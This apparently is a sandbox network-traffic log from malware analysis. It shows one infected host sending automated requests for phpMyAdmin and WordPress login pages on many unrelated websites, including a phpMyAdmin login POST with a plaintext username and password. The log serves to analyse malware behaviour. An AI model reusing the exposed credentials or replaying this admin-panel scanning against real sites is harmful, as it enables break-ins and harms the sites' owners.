2d 74 69 74 6c Data Ascii: .is-style-outline:not(.has-background),.wp-block-button.is-style-outline>.wp-block-button__link.wp-element-button:not(.has-background){background-color:var(--ast-global-color-7);}.entry-content[ast-blocks-layout] > figure{margin-bottom:1em;}h1.widget-titl
2024-02-20 23:26:16 UTC	16384	IN	Data Raw: 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 66 75 6c 6c 2c 2e 61 73 74 2d 70 6c 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 77 69 64 65 2c 2e 61 73 74 2d 70 61 67 65 2d 62 75 69 6c 64 65 72 2d 74 65 6d 70 6c 61 74 65 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 77 69 64 65 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 Data Ascii: t-no-sidebar .entry-content .wp-block-column .alignfull,.ast-plain-container.ast-no-sidebar .entry-content .wp-block-column .alignwide,.ast-page-builder-template.ast-no-sidebar .entry-content .wp-block-column .alignwide {margin-left: auto;margin-right: au
2024-02-20 23:26:16 UTC	16384	IN	Data Raw: 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 34 35 70 78 3b 7d 2e 73 69 74 65 2d 70 72 69 6d 61 72 79 2d 66 6f 6f 74 65 72 2d 77 72 61 70 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 70 72 69 6d 61 72 79 2d 66 6f 6f 74 65 72 2d 62 75 69 6c 64 65 72 22 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 38 29 3b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 Data Ascii: dding-bottom:45px;}.site-primary-footer-wrap[data-section="section-primary-footer-builder"]{background-color:var(--ast-global-color-8);;background-image:none;;border-style:solid;border-width:0px;border-top-width:1px;border-top-color:var(--ast-global-color
2024-02-20 23:26:16 UTC	16384	IN	Data Raw: 29 7b 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 77 72 61 70 20 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 2c 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 20 2e 73 69 74 65 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 77 72 61 70 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 70 78 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 34 34 70 78 29 7b 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 2d 77 72 61 70 20 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 20 2c 2e 61 73 74 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 62 61 72 20 2e 73 69 74 65 2d 70 72 69 6d 61 72 79 2d 68 65 61 64 65 72 2d 77 72 61 70 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 Data Ascii: ){.ast-mobile-header-wrap .ast-primary-header-bar,.ast-primary-header-bar .site-primary-header-wrap{min-height:100px;}}@media (max-width:544px){.ast-mobile-header-wrap .ast-primary-header-bar ,.ast-primary-header-bar .site-primary-header-wrap{min-height:8
2024-02-20 23:26:16 UTC	16384	IN	Data Raw: 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 33 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 34 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 34 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 2d 62 61 Data Ascii: s-ast-global-color-3-background-color{background-color: var(--wp--preset--color--ast-global-color-3) !important;}.has-ast-global-color-4-background-color{background-color: var(--wp--preset--color--ast-global-color-4) !important;}.has-ast-global-color-5-ba
2024-02-20 23:26:16 UTC	16384	IN	Data Raw: 6c 65 2d 70 6f 73 74 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 2e 35 65 6d 3b 7d 2e 73 69 6e 67 6c 65 20 2e 61 73 74 2d 61 75 74 68 6f 72 2d 6d 65 74 61 20 2e 61 73 74 2d 61 75 74 68 6f 72 2d 64 65 74 61 69 6c 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 7d 2e 70 6f 73 74 2d 61 75 74 68 6f 72 2d 62 69 6f 20 2e 61 75 74 68 6f 72 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 32 32 70 78 29 7b 2e 73 69 6e 67 6c 65 20 2e 70 6f 73 74 2d 61 75 74 68 6f 72 2d 61 76 61 74 61 72 2c 2e 73 69 6e 67 6c 65 20 2e 70 6f 73 74 2d 61 75 74 68 6f 72 2d 62 69 6f 7b 66 6c 6f 61 74 3a 6c Data Ascii: le-post:last-child{margin-bottom:2.5em;}.single .ast-author-meta .ast-author-details{display:flex;align-items:center;}.post-author-bio .author-title{margin-bottom:10px;}}@media (min-width:922px){.single .post-author-avatar,.single .post-author-bio{float:l
2024-02-20 23:26:16 UTC	16384	IN	Data Raw: 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 70 6f 73 74 2d 31 38 32 34 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 63 73 73 2f 70 6f 73 74 2d 31 38 32 34 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 37 35 33 34 36 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 73 2d 65 6b 69 74 69 63 6f 6e 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f Data Ascii: 2' media='all' /><link rel='stylesheet' id='elementor-post-1824-css' href='https://www.cabinet-orsika.fr/wp-content/uploads/elementor/css/post-1824.css?ver=1703753462' media='all' /><link rel='stylesheet' id='elementor-icons-ekiticons-css' href='https:/
2024-02-20 23:26:16 UTC	16384	IN	Data Raw: 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 39 32 31 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 2f 64 72 2d 66 69 72 61 6e 64 65 2d 6b 61 68 61 6c 65 68 2f 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 75 62 2d 69 74 65 6d 20 6d 65 6e 75 2d 6c 69 6e 6b 22 3e 44 72 20 46 69 72 61 6e 64 65 20 4b 41 48 41 4c 45 48 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d Data Ascii: em menu-item-type-post_type menu-item-object-page menu-item-1921"><a href="https://www.cabinet-orsika.fr/dr-firande-kahaleh/" class="elementor-sub-item menu-link">Dr Firande KAHALEH</a></li><li class="menu-item menu-item-type-post_type menu-item-object-
2024-02-20 23:26:16 UTC	16384	IN	Data Raw: 65 6e 74 6f 72 2d 73 75 62 2d 69 74 65 6d 20 6d 65 6e 75 2d 6c 69 6e 6b 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 50 61 72 6f 64 6f 6e 74 6f 6c 6f 67 69 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 39 34 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 62 69 6e 65 74 2d 6f 72 73 69 6b 61 2e 66 72 2f 70 72 6f 70 68 79 6c 61 78 69 65 2d 64 65 6e 74 61 69 72 65 2d 6e 6f 69 73 79 2d 6c 65 2d 72 6f 69 2f 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 75 62 2d 69 74 65 6d 20 6d 65 6e 75 Data Ascii: entor-sub-item menu-link" tabindex="-1">Parodontologie</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1942"><a href="https://www.cabinet-orsika.fr/prophylaxie-dentaire-noisy-le-roi/" class="elementor-sub-item menu

Session ID	Source IP	Source Port	Destination IP	Destination Port
178	192.168.2.6	63987	62.210.211.126	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	185	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: voltage-distribution.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	180	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 287 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:15 UTC	287	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 20 50 6f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at voltage-distribution.com Po

Session ID	Source IP	Source Port	Destination IP	Destination Port
179	192.168.2.6	64010	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	390	OUT	POST /phpMyAdmin/index.php?route=/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip Cookie: phpMyAdmin_https=g2a30bp049ecbdl879i2cnu3gr; pma_lang_https=en User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://amsantechnology.com/phpMyAdmin/ Content-Length: 172 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:15 UTC	172	OUT	Data Raw: 72 6f 75 74 65 3d 25 32 46 26 6c 61 6e 67 3d 65 6e 26 74 6f 6b 65 6e 3d 34 61 37 34 36 34 34 31 36 33 32 61 34 33 36 64 33 65 32 33 34 66 37 34 37 35 32 34 36 36 36 33 26 73 65 74 5f 73 65 73 73 69 6f 6e 3d 67 32 61 33 30 62 70 30 34 39 65 63 62 64 6c 38 37 39 69 32 63 6e 75 33 67 72 26 70 6d 61 5f 75 73 65 72 6e 61 6d 65 3d 73 61 6e 74 6f 73 68 25 34 30 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 26 70 6d 61 5f 70 61 73 73 77 6f 72 64 3d 65 64 65 34 64 65 6c 65 63 35 61 26 73 65 72 76 65 72 3d 31 Data Ascii: route=%2F&lang=en&token=4a746441632a436d3e234f7475246663&set_session=g2a30bp049ecbdl879i2cnu3gr&pma_username=santosh%40amsantechnology.com&pma_password=ede4delec5a&server=1
2024-02-20 23:26:15 UTC	1379	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache X-ob_mode: 1 X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow Expires: Tue, 20 Feb 2024 23:26:15 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 Pragma: no-cache Vary: Accept-Encoding Set-Cookie: phpMyAdmin_https=sgimu50s8ohv0gk7i601eb9kgt; path=/phpMyAdmin/; secure; HttpOnly; SameSite=Strict Set-Cookie: pmaAuth-1_https=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/phpMyAdmin/; secure Last-Modified: Tue, 20 Feb 2024 23:26:15 GMT Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
2024-02-20 23:26:15 UTC	6813	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 2000<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:15 UTC	1385	IN	Data Raw: 69 6e 75 74 65 27 3b 0a 20 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c Data Ascii: inute'; $.timepicker.regional[''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required',
2024-02-20 23:26:15 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:16 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 31 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 Data Ascii: 20001\u007D'), max: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equ
2024-02-20 23:26:16 UTC	6	IN	Data Raw: 0a 20 20 20 20 20 Data Ascii:
2024-02-20 23:26:16 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:16 UTC	2420	IN	Data Raw: 39 36 38 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 65 73 22 3e 45 73 70 61 26 6e 74 69 6c 64 65 3b 6f 6c 20 2d 20 53 70 61 6e 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 73 76 22 3e 53 76 65 6e 73 6b 61 20 2d 20 53 77 65 64 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 74 72 22 3e 54 26 75 75 6d 6c 3b 72 6b 26 63 63 65 64 69 6c 3b 65 20 2d 20 54 75 72 6b 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 968 <option value="es">Español - Spanish</option> <option value="sv">Svenska - Swedish</option> <option value="tr">Türkçe - Turkish</option>

Session ID	Source IP	Source Port	Destination IP	Destination Port
180	192.168.2.6	64044	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	355	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oj6p6lfvhecu1oc8sf9095ke5t; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: /
2024-02-20 23:26:15 UTC	11	IN	Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
181	192.168.2.6	64068	75.2.70.75	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	171	OUT	GET /phpMyAdmin HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	182	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/phpMyAdmin
2024-02-20 23:26:15 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
182	192.168.2.6	64125	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	178	OUT	GET /wp-login.php HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	188	IN	HTTP/1.1 503 Service Unavailable Date: Tue, 20 Feb 2024 23:26:15 GMT Server: Apache/2.4.58 (Unix) Content-Length: 299 Content-Type: text/html; charset=iso-8859-1 Connection: close
2024-02-20 23:26:17 UTC	299	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 0a 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 0a 70 72 6f 62 6c 65 6d 73 2e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>503 Service Unavailable</title></head><body><h1>Service Unavailable</h1><p>The server is temporarily unable to service yourrequest due to maintenance downtime or capacityproblems.

Session ID	Source IP	Source Port	Destination IP	Destination Port
183	192.168.2.6	64367	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	184	OUT	GET /phpmyadmin/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	1342	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:15 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: pma_lang_https=en; expires=Thu, 21-Mar-2024 23:26:15 GMT; Max-Age=2592000; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: 